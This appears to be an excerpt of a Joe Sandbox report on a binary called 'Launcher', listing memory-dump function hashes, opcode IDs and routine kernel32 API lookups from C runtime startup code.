                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: /AG
                                                                        • API String ID: 0-429173468
                                                                        • Opcode ID: 5bf9bc4743e92e801110c16e1e1a6798670fd257678139d8f1a4f53805c9afb8
                                                                        • Instruction ID: db9a0b4dfea41108335f0a407c7d33345c3d109be444455fd645843256c24d7d
                                                                        • Opcode Fuzzy Hash: 5bf9bc4743e92e801110c16e1e1a6798670fd257678139d8f1a4f53805c9afb8
                                                                        • Instruction Fuzzy Hash: 2B6136B2610B018BC324CF25C9916A3BBF2FF96314F49995DC4D68BB95E738A806CB44
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: bNLV
                                                                        • API String ID: 0-346797206
                                                                        • Opcode ID: 0013062a79eb5dbc58cabba1237e6767f189077d539472ca9c7babac2483338f
                                                                        • Instruction ID: afda5bf75f1f78cb49c648d636ab67f5a1453f3ecd0fd1dd5d0ff7308ee6564c
                                                                        • Opcode Fuzzy Hash: 0013062a79eb5dbc58cabba1237e6767f189077d539472ca9c7babac2483338f
                                                                        • Instruction Fuzzy Hash: EC5148B1608B814BD319CF38C8603E3BBA2AF93308F5DC5ADC1E24B356D77965468758
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: bNLV
                                                                        • API String ID: 0-346797206
                                                                        • Opcode ID: 0a4a9a8859d789d4f71a42b94f912eacdcaf339e6f1ceb799e64ce8c398cced0
                                                                        • Instruction ID: 27a159d7ac2624ea253f79df2db77bdd57b40a2df15003da0a9ee6f62b1e2e80
                                                                        • Opcode Fuzzy Hash: 0a4a9a8859d789d4f71a42b94f912eacdcaf339e6f1ceb799e64ce8c398cced0
                                                                        • Instruction Fuzzy Hash: DD515A70604B908AD326CF39D4903E3BBE2AF97308F58C5AEC1E60B356D6BD6546871C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .L6d
                                                                        • API String ID: 0-3689564033
                                                                        • Opcode ID: 52a1620b55584a0b3069d913d873da39473c9a49c859e39cccb799168cc7aa56
                                                                        • Instruction ID: b3b80b292b9c2592f918aecac32d9bf9aff12df46ab72a7f5f46870c8d66b613
                                                                        • Opcode Fuzzy Hash: 52a1620b55584a0b3069d913d873da39473c9a49c859e39cccb799168cc7aa56
                                                                        • Instruction Fuzzy Hash: 1C51F6B4A047508FE3258B39D4907B3BBE0EF67300F24489ED4E787392D278A5458B69
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: SW
                                                                        • API String ID: 0-625006655
                                                                        • Opcode ID: 869c7119e643443874cd61e064ba24bf401558557341c27c2f31387fee03dab2
                                                                        • Instruction ID: 5d9f2363fabf42677fb571d2220c82bc289fbd14246ff3687941838be9d0c232
                                                                        • Opcode Fuzzy Hash: 869c7119e643443874cd61e064ba24bf401558557341c27c2f31387fee03dab2
                                                                        • Instruction Fuzzy Hash: 4051267194C3938AD334DF39D861BABBAE1AFC6304F08893DD8D997692E7780504D786
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3019521637
                                                                        • Opcode ID: 46ae62597b49b084656ba533626074b253d2be57493eef55916a1d20d10db3d5
                                                                        • Instruction ID: 5f1565635af4d5f91d3e1fbc5b9aff3f95ec9d96fa10469e2fbb41994dbd59c0
                                                                        • Opcode Fuzzy Hash: 46ae62597b49b084656ba533626074b253d2be57493eef55916a1d20d10db3d5
                                                                        • Instruction Fuzzy Hash: 543137B1A043006BE610AA15DC41B7BB3A8EF9E718F04653EFD86972D3E3B5DC15825A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: 7654
                                                                        • API String ID: 2994545307-4024152101
                                                                        • Opcode ID: bed417bb34f37d25c7c923fb16c4ecbb63d8fcad9ac46b1c89647715ee02ff4a
                                                                        • Instruction ID: 07b2bc39b660a2127a801fcb1b0e8c0ba885f34615d13a0a3f58d585ff3512a4
                                                                        • Opcode Fuzzy Hash: bed417bb34f37d25c7c923fb16c4ecbb63d8fcad9ac46b1c89647715ee02ff4a
                                                                        • Instruction Fuzzy Hash: 573125346182409BD328CB25C491B7BB761AF91314F54893ED08B232E2CB399C52CF5B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-3019521637
                                                                        • Opcode ID: e3e5cbc5dd9bbf2317c34db2ffb6bb1115f1eabd1792bfa7cb93aa03cdf65a33
                                                                        • Instruction ID: 59d445325523166152dc146d909279a4f6499651f5095f3f0f56464fc1f6b4d1
                                                                        • Opcode Fuzzy Hash: e3e5cbc5dd9bbf2317c34db2ffb6bb1115f1eabd1792bfa7cb93aa03cdf65a33
                                                                        • Instruction Fuzzy Hash: 5821E5747486218BC7188F14A48193FB356FFA2314FA5511ED84247662D378DC639BCF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3019521637
                                                                        • Opcode ID: 4360b9a0dbcb048b31625e884e474d230f3ccf18c6803161638f971b72f92b1f
                                                                        • Instruction ID: ca349acebf200c130f07c25eb8c9f900c512d4fe60b0edf43c0723bea5fd6d56
                                                                        • Opcode Fuzzy Hash: 4360b9a0dbcb048b31625e884e474d230f3ccf18c6803161638f971b72f92b1f
                                                                        • Instruction Fuzzy Hash: CD01D274A04610CBDB149F10E99053FB7A1FB86314F58956DDA910B252D374DC00CB5E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3019521637
                                                                        • Opcode ID: 1afb893726f46772e7593d518e2cfa7ea3916efc63878d48ce905e34f30bf491
                                                                        • Instruction ID: de03f4f47443a8bd39c365dfb0ef4407cee9922f27402f28625e57e8ebf2b2aa
                                                                        • Opcode Fuzzy Hash: 1afb893726f46772e7593d518e2cfa7ea3916efc63878d48ce905e34f30bf491
                                                                        • Instruction Fuzzy Hash: FFF0AF30B0A2218BD614CF14B95113FFBE1AFD6320F69562EE48227651CB78E842C78F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 46058562c2914b172cae08c48a1055d684e203c1e75c7eba90490f348242528e
                                                                        • Instruction ID: 51b159df0d36f693b031eaab9385a80d08230fa316fccbb5eeefeff4cb7c6d8c
                                                                        • Opcode Fuzzy Hash: 46058562c2914b172cae08c48a1055d684e203c1e75c7eba90490f348242528e
                                                                        • Instruction Fuzzy Hash: 5DF1D2356087418FC724CF29C88066BFBE2EFD9304F08882DE5DA87791E679E914CB56
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 24e978d94e56725f1d1b472ecd9cf3898dfda095cfba4a6f6882cce1a2b1b29e
                                                                        • Instruction ID: d8a9fec0027e62857f9e7bfb6e5d6553db6d99cc1398c4a4585c21a2a51ac729
                                                                        • Opcode Fuzzy Hash: 24e978d94e56725f1d1b472ecd9cf3898dfda095cfba4a6f6882cce1a2b1b29e
                                                                        • Instruction Fuzzy Hash: BF9149756447408FE721CF35C8C1BA7BBE2EFA2304F58856ED0DA8B386DA39A406C755
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d32814b42b1c4023a689e78a7efeb042f14edfef4c22c81f02d20c71882a955d
                                                                        • Instruction ID: 880aa2baef86b0448762cace4d4ccd93be02fb106297aa52c3179b4be83c6bda
                                                                        • Opcode Fuzzy Hash: d32814b42b1c4023a689e78a7efeb042f14edfef4c22c81f02d20c71882a955d
                                                                        • Instruction Fuzzy Hash: 15811071A183218BC714CF28D85166BB3F1FFD6708F48892DE8858B390E779D905C79A
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: ece5df5b6cd9393a726ded35b5de15b49529ff404c918f7e2f0173a43e32689a
                                                                        • Instruction ID: 5c0c2071a4dcea8812aeb69c0a8b309c6f21e53569e031a8c36ce4244bbbab29
                                                                        • Opcode Fuzzy Hash: ece5df5b6cd9393a726ded35b5de15b49529ff404c918f7e2f0173a43e32689a
                                                                        • Instruction Fuzzy Hash: 5791E271A083118BD724CF58C480A2BB7F2FF89704F19892DEA854B351DB79EC25C789
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 553dfa5f3bbfa688dded42275a24ce6ca5cd46ad06b52228966fd15d9d5d520a
                                                                        • Instruction ID: d0e0070986afb1801afce02a0cda79511d46dc230b4459934c59a808afd21370
                                                                        • Opcode Fuzzy Hash: 553dfa5f3bbfa688dded42275a24ce6ca5cd46ad06b52228966fd15d9d5d520a
                                                                        • Instruction Fuzzy Hash: 937139315483818BD7258A78994C367BBD19F52304F18897FD8C69B3C2D2BCC945D39A
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b519613685f07e80bbd9a7bb98aeb69bda72d3d3ee017d028535196f28c4bf3b
                                                                        • Instruction ID: cd0b3e3533dd20fca185efeb8ae37a451f97122a8cedeb124bcf32d4b59a7fad
                                                                        • Opcode Fuzzy Hash: b519613685f07e80bbd9a7bb98aeb69bda72d3d3ee017d028535196f28c4bf3b
                                                                        • Instruction Fuzzy Hash: DC512374A00205DBEF048F69DC46BBFB7B1FB8A314F10552EEA15A7291D7B99C01CB98
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 62470d2211a21ddd1af935ebe00ec76f225f8dc3dfb16d34274c3483cb670149
                                                                        • Instruction ID: 42addddd87d91ddbe1cf349074bdd9d0cf00f2e64c64de931b6530428438a1cb
                                                                        • Opcode Fuzzy Hash: 62470d2211a21ddd1af935ebe00ec76f225f8dc3dfb16d34274c3483cb670149
                                                                        • Instruction Fuzzy Hash: 11715779204B01CFDB248F21D894B57B7F5FB4A301F14882DE5AA876A1D771E919CF48
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a4ab4ca7fff76a47d068eee754a10f99cc795f7ca8f0d74a3a1a6a19be915fb3
                                                                        • Instruction ID: 2031b64c494bd07dc0a8d339c49fbe6ba61d9ab32cbe0a574a32405f6ed6b2c1
                                                                        • Opcode Fuzzy Hash: a4ab4ca7fff76a47d068eee754a10f99cc795f7ca8f0d74a3a1a6a19be915fb3
                                                                        • Instruction Fuzzy Hash: D5518779204B01CFDB248F21DC94B67B7B9FB0A301F10882DE5AA876A1D771E919CF58
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4c53f7a2151e56eef5c59a7df9eda93d5b2c34911c251c26dec7387734fd79ff
                                                                        • Instruction ID: 8cd7e6e44a76840e0cf9c864b4dc42ee17bbf449749c8835b13b38f734b63783
                                                                        • Opcode Fuzzy Hash: 4c53f7a2151e56eef5c59a7df9eda93d5b2c34911c251c26dec7387734fd79ff
                                                                        • Instruction Fuzzy Hash: E751807550C3940BC7258A2884902BBF7E29BDE308F185A6EF8D68B387D17CDD46C785
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3428ae193c7bcd2e174d8a32087c8df524dc9356a0fe233551d390cfdcb49e04
                                                                        • Instruction ID: 24a54a2c8675229cdaea495314ee0bf535e293b52c9439375662e7bc93ac26ca
                                                                        • Opcode Fuzzy Hash: 3428ae193c7bcd2e174d8a32087c8df524dc9356a0fe233551d390cfdcb49e04
                                                                        • Instruction Fuzzy Hash: 7F3129B6A483509BD310CF19D8806ABBBE2BFD4718F088A2DE4C557345CB34D90ACBD6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3940700e1baaa0d0eeee129a3909170ae08500f5026dffdff98a13603b77694a
                                                                        • Instruction ID: 11f603fb0d9f721776d2b97ae2b39e9d4217bc6374cc303b5386588e03e1bb29
                                                                        • Opcode Fuzzy Hash: 3940700e1baaa0d0eeee129a3909170ae08500f5026dffdff98a13603b77694a
                                                                        • Instruction Fuzzy Hash: 1521E533A52A184BD3108D69CC80796729297DD338F3E46B989749B7D2D87B6C1386C4
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                        • Instruction ID: 65453c637e7d10ab468198b684bbdf40907617de88f130c8a64cfe96f977c526
                                                                        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                        • Instruction Fuzzy Hash: CF112933A045E44EC3128E3C8400565BFE30A97635F5D539AF4B89B2D2D62A8E8A8359
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0dd737344ac88ef9878c80e5d4e4098b04a22f2bbfbe13be4050065726199be3
                                                                        • Instruction ID: fa038fc164eeecd97fe6772c4f5c4ecdd241b064536ba8883c776843f79b63ce
                                                                        • Opcode Fuzzy Hash: 0dd737344ac88ef9878c80e5d4e4098b04a22f2bbfbe13be4050065726199be3
                                                                        • Instruction Fuzzy Hash: C10192B570071147D620AE55A4D0727A3A8DF90B08F48843EDA449B743EB7EFC0487D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 739e20d83a75b12cc4edc0c0cb4c03b76f2ec2cbdeb089ca078a816bd730316f
                                                                        • Instruction ID: ab629cee7c6d59a73fa31a6ef5f2130a65cb21d096da26a4ed122ccb78a54fc1
                                                                        • Opcode Fuzzy Hash: 739e20d83a75b12cc4edc0c0cb4c03b76f2ec2cbdeb089ca078a816bd730316f
                                                                        • Instruction Fuzzy Hash: 971129696447808FD319CB3AD8543A3BBA35FD7210F5C85AEC4D58B386CB385407C316
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c2c1597807e07014396e67b3087708c85ca5cdec378a0f3833d6b9652d686c78
                                                                        • Instruction ID: 8a03683c1672b3882a45e19e6ca236dd169e47525db707a9347a8ccc0bc35e0e
                                                                        • Opcode Fuzzy Hash: c2c1597807e07014396e67b3087708c85ca5cdec378a0f3833d6b9652d686c78
                                                                        • Instruction Fuzzy Hash: 8701D43064C3516BE300DF64E856B6BBBE4DB92304F549C2DF08097252EB78D60A875A
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 59b0d329a4713a373ddf3faf30a698ba87af2c1adf7a79306f4269258a6df32d
                                                                        • Instruction ID: 81cdd60912a32447842a30ee473c6ea26498f306dd56cb5fe75476b0e5a86237
                                                                        • Opcode Fuzzy Hash: 59b0d329a4713a373ddf3faf30a698ba87af2c1adf7a79306f4269258a6df32d
                                                                        • Instruction Fuzzy Hash: 7401DB35A14740CFE724CF35D445BA377E29B52304F08846DD0CB9B356C6796405CB59
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9cb268d8788da9834873df3f7ec4d4cafb1614ec54c6f70f9c1df89b9735a9ad
                                                                        • Instruction ID: db7a20aa1f5cd9bcf6f29cfc8e7f396a982dd41fada3cd5c80b4433a2b6e395f
                                                                        • Opcode Fuzzy Hash: 9cb268d8788da9834873df3f7ec4d4cafb1614ec54c6f70f9c1df89b9735a9ad
                                                                        • Instruction Fuzzy Hash: B9D0C22064B7C44BC3170B309940163BF329F93110F095ADEC0C11B497C255E406C39D
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00249CD6
                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00249CE4
                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00249CF5
                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00249D06
                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00249D17
                                                                        • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00249D28
                                                                        • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00249D39
                                                                        • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00249D4A
                                                                        • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00249D5B
                                                                        • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00249D6C
                                                                        • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00249D7D
                                                                        • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00249D8E
                                                                        • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00249D9F
                                                                        • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00249DB0
                                                                        • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00249DC1
                                                                        • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00249DD2
                                                                        • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00249DE3
                                                                        • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00249DF4
                                                                        • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00249E05
                                                                        • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00249E16
                                                                        • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00249E27
                                                                        • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00249E38
                                                                        • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00249E49
                                                                        • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00249E5A
                                                                        • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00249E6B
                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00249E7C
                                                                        • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00249E8D
                                                                        • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00249E9E
                                                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00249EAF
                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00249EC0
                                                                        • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00249ED1
                                                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00249EE2
                                                                        • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00249EF3
                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00249F04
                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00249F15
                                                                        • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00249F26
                                                                        • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00249F37
                                                                        • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00249F48
                                                                        • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00249F59
                                                                        • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00249F6A
                                                                        • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00249F7B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300473417.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000003.00000002.2300448136.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300510676.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300534969.0000000000260000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300562910.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300596949.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModule
                                                                        • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                        • API String ID: 667068680-295688737
                                                                        • Opcode ID: d973fabfa58ea5cdc358302dad741e648ba755af2095f2051f33ac414267a3d0
                                                                        • Instruction ID: 5b8257fa02331ddbd858a0cff9ca0d1b3e66d3bbc0981dfcb68a9008b7327884
                                                                        • Opcode Fuzzy Hash: d973fabfa58ea5cdc358302dad741e648ba755af2095f2051f33ac414267a3d0
                                                                        • Instruction Fuzzy Hash: 5C615871962350AFEB096FF5BC0D8963BE8AB0E7033054467F501D31A1DBF466648F68
                                                                        APIs
                                                                        • type_info::operator==.LIBVCRUNTIME ref: 0024E212
                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 0024E320
                                                                        • CatchIt.LIBVCRUNTIME ref: 0024E371
                                                                        • _UnwindNestedFrames.LIBCMT ref: 0024E472
                                                                        • CallUnexpected.LIBVCRUNTIME ref: 0024E48D
                                                                        Strings
                                                                        Memory Dump Source
